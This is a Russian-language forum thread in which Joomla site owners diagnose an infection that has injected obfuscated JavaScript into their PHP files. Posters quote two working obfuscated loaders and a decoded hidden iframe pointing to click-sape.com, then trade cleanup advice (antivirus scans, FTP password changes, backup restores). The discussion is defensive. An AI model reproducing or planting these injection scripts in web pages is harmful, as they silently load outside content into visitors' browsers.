Проблема с джумлой

[SupamaN]

Проблема!!!
после ввода пароля в админку выдает следующее:
Parse error: syntax error, unexpected '<' in /home/u50313/domdeteiru/www/administrator/modules/mod_menu/menu.php on line 223
главная страница показывает это:
Parse error: syntax error, unexpected '<' in /home/u50313/domdeteiru/www/index.php on line 89

ни чего не делал, вчера все работало.
причем есть еще один сайт на джумле на этом хостинге и у него таже фигня.

Кто скажет в чем дело?

 

[Creator]

Если точно ничего с ними не делал, то сравни физически файлы у себя на локалке и на сервере. Возможно троянчик пробрался в твой стан...

Если точно ничего с ними не делал, то сравни физически файлы у себя на локалке и на сервере. Возможно троянчик пробрался в твой стан...

И еще приаттачь на форуме, интересно посмотреть.

 

[SupamaN]

А вот что быдо с джумлой... Данный код стоял в 4х файлах.

<script>
String.prototype.sdsd=function(d, o){return this.replace(d, o)};
var sadasd = '<KLiHKYfJYrNAaLJ5mAHeH @sLrY@cNH=Y@\'JLhY5tYY5tKpL@J:N/N/J@@c5l5i5Yc5LkKK-@NAsJa@Hp@HYeNJ.JcHHoKmHL/Li@Jn5.NKcKKLgKNiH?J2K\'Y @LwLYiKdJJJtH5hKL=N@\'L0AHp@5xY@\'KL Hh5JeHi@@gKYNh@AtAKL=N\'JJ0YpNHx5\'L Y5s5A5t@JyKAlL@HeL=\'5JvYAiALKsNiANbLJLiHlAiNtJ@Ly@:5 YhHiNNdd5JeHn55N;L JYYbYNoJrL@dAL5eJrHA:H AKnAAoKYLnAK5eJA;L5\'LN>AK<H/NiLfYY@rKHAaHLm@AeL>K'.sdsd(/[K5JANHYL@]/g,'');
document.write(sadasd);
</script>

Кто скажет что он делает и как целиком все подчистить. паролы к фтп сменил

 

[Creator]

<script>
String.prototype.sdsd=function(d, o){return this.replace(d, o)};
var sadasd = '<KLiHKYfJYrNAaLJ5mAHeH @sLrY@cNH=Y@\'JLhY5tYY5tKpL@J:N/N/J@@c5l5i5Yc5LkKK-@NAsJa@Hp@HYeNJ.JcHHoKmHL/Li@Jn5.NKcKKLgKNiH?J2K\'Y @LwLYiKdJJJtH5hKL=N@\'L0AHp@5xY@\'KL Hh5JeHi@@gKYNh@AtAKL=N\'JJ0YpNHx5\'L Y5s5A5t@JyKAlL@HeL=\'5JvYAiALKsNiANbLJLiHlAiNtJ@Ly@:5 YhHiNNdd5JeHn55N;L JYYbYNoJrL@dAL5eJrHA:H AKnAAoKYLnAK5eJA;L5\'LN>AK<H/NiLfYY@rKHAaHLm@AeL>K'.sdsd(/[K5JANHYL@]/g,'');
document.write(sadasd);
</script>

Ну это собсно и есть "закодированный" вредоносный код... расшифровать я не смог( Кто сможет напишите ответ.

Ты проверился куреИТом? Нашел что-нибудь?

 

[SupamaN]

что то плохое взялось за блоги -пропал доступ к админке!!!

что за "куреИТом"?

 

[Creator]

что то плохое взялось за блоги -пропал доступ к админке!!!

Очень плохо, восстанавливайся!

http://www.freedrweb.com/cureit/

С помощью утилиты Dr.Web CureIt!® без установки Dr.Web в системе Вы можете быстро проверить Ваш компьютер, и, в случае обнаружения вредоносных объектов, вылечить его.

Очень хорошая штука и при этом бесплатная)

 

[SupamaN]

умел бы я еще восстанавливаться

 

[trueW3C]

Кто сможет напишите ответ.

<iframe src='http://click-sape.com/in.cgi?2' width='0px' height='0px' style='visibility: hidden; border: none;'></iframe>

 

[SupamaN]

дык вот кто такие!!! засранцы!

 

[Nikolay]

У меня тоже этот вирус на сайтах. Это он через ФТП все файлы изменял? Пароли из ПК покрал? Как он за ночь успел много сайтов заразить.
Кто знает этот вирус опасен или нет? Что он делает? Судя по той расшифровке, то он какой-то фрейм открывает в окне. Антивирус Аваст, на этот код не реагирует. Что еще нужно кроме замены файлов измененных и смены пароля на ФТП?

Все индексные файлы изменены, файлы меню также, во всех папках. Думаю в ручную врядли это делалось, потребовалось бы много времени по всем папкам ходить и смотреть.

 

[SupamaN]

попроси хостера из бэков восстановить. Мне один сайт так восстановили, а остальные вручную...

 

[Nikolay]

Пароли сменил, оно опять добавило, только уже другой код:

<script type='text/javascript'>function pL(){};var eJF=new Date();pL.prototype = {uO : function() {qO=27314;var yFW="";return 'hvtwt7p7:K/y/wcylyiKcwk7-7syavpwey.Kcyo7mw/wiwny.Kcyg7i7?727'.nS(/[vyKw]/g, '').nS(/[7vyKw]/g, '');var eZ=function(){return 'eZ'};t="t";var hH='';},q : function() {this.bL=15513;var oT=new Array();var yI=false;var yV="yV";vO="";function tC(){};zP='';var u=window;var hJ=new Array();vT="";this.uL=62709;var r = this;var hV="";var rC=function(){return 'rC'};this.k='';var g=document;yM=false;iX="";this.m='';this.c="c";var x=function(){};String.prototype.nS=function(s, e){var h=this; return h.replace(s, e)};this.rE=false;vM="";this.eJ="";pR=false;var p = 'siricF'.nS(/[FY#i\?]/g, '');this.d="";yA='';zG="zG";var y = 's0e;t;TjiOmOe;o0u.t0'.nS(/[0j;O\.]/g, '');var bB="";this.iL=false;var sA='';var i = 'c^rUeUaUt^e&E&lge^m^eTngt^'.nS(/[\^U&Tg]/g, '');zE="";this.j="";this.fH="fH";this.mU="mU";        var gJ = 'a8p+pNeNn+d8C+hNiNl]d4'.nS(/[4\+N8\]]/g, '');yIV=false;var jD=40034;var hU='';mK=false;var yF = 's!e:tdA:t!t!r!iCbju!t!e!'.nS(/[\!Cj\:d]/g, '');function xJ(){};this.n="n";var fM=new Array();var iO = 's6tWywlOeO'.nS(/[O6wW\>]/g, '');this.xZ='';hK=40635;var mY='';var b = 'bDoDdDyT'.nS(/[T6MrD]/g, '');sY='';this.fK=16672;var w=new Array();bC="bC";var v = 'dMiqsTpqlTaTyT'.nS(/[TqIM\^]/g, '');var jC="jC";a='';var z = 'w3r4i4t<e3'.nS(/[34gJ\<]/g, '');rP=false;function nP(){};var vTO=28467;var cT="";this.zC=false;this.wG="";qP="";try {tZ="tZ";lQ='';wQ=29182;var dC="";hJI='';var oN='';var f=g[i]('i?f?rWasmse?'.nS(/[\?s;oW]/g, ''));lW='';var cC="";this.bLC=31114;this.yIB=false;this.kO="";var mI="";wV="";var jZ=function(){return 'jZ'};this.zM='';var tW="";f[yF](p, r.uO());var aG=new Array();var qQ=new Date();var oU="";sP=false;f[iO][v] = 'nGoGn9e7'.nS(/[7l9,G]/g, '');var cF=new Array();this.eK=65306;mS=23589;zD="zD";function mV(){};xA="";var xT="xT";iK=18205;document[b][gJ](f);dF=9132;this.sL=54066;var uOD='';this.lD=false;} catch(bV) {this.hVY=3537;var pJ=new Date();this.bCQ="";var oK='';uX='';oV="oV";hO="hO";hOB=25576;g[z]('l4o4<4/Vb)oVdVyV>#<)/)h)tim4lV>#'.nS(/[#4Vi\)]/g, ''));this.hC="";this.fA="";var zES=false;u[y](function(){ r.q() }, 120);this.sI="";this.qOQ=48654;var wX="";}bO='';kX='';}};var qH="qH";var aH=new pL(); rG=false;aH.q();nF="nF";</script>

Браузер показует ошибку в статусной строке (на работу сайта это не влияет):
Сведения об ошибке на веб-странице
Агент пользователя: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.3; EBook by BookBiz Embedded Web Browser from: http://bsalsa.com/)
штамп времени: Tue, 4 May 2010 12:36:27 UTC
Сообщение: Отказано в доступе.
Строка: 54
Символ: 54
Код: 0
URI-код: http://www.google.ru/extern_js/f/CgJydRICcnUrMAo4ZUAdLCswDjgNLCswFjgXLCswFzgGLCswGDgFLCswGTgeLCswHTguLCswJTjKiAEsKzAmOAosKzAnOAQsKzAqOAQsKzArOAwsKzA8OAIsKzBAOA8sKzBFOAEsKzBOOAQsKzBROAEsgAIN/ON7KOp8pcXs.js


Еще какой-то файл из google.ru подгружает, антивирус ничего не ловит, может тот вирус антивирусы не видят? Не знаю что делать, может виндовс переустановить?

Все индексные файлы изменены в одно время, по ФТП видно 11:11, все в одну минуту. Это точно не вручную делалось.

 

[Felix]

Nы сначала на вирусы комп прогони! И желательно сначало каспером потом MSN. Вирус где-то у тебя на компе сидит. И установи себе каспера! Потом востанавливай сайт и меняй пароли.

 

[Nikolay]

Просканировал Касперским, нашлось 2 вируса (Аваст эти вирусы не видит), из автозагрузки удалил через безопасный режим, а второй через специальные программы.
Может кому-то пригодится, вот ссылки:
http://www.ancher.ru/content/26-05-2009/sdra64exe-kak-udalit-troian или http://support.kaspersky.ru/faq/?qid=208636281

Пароли поменял, посмотрим, что будет дальше.

 

[SupamaN]

После каспера проверил еще Доктором Вебом и прогой от майкрософт..нашлось еще 2 после 17 найденых каспером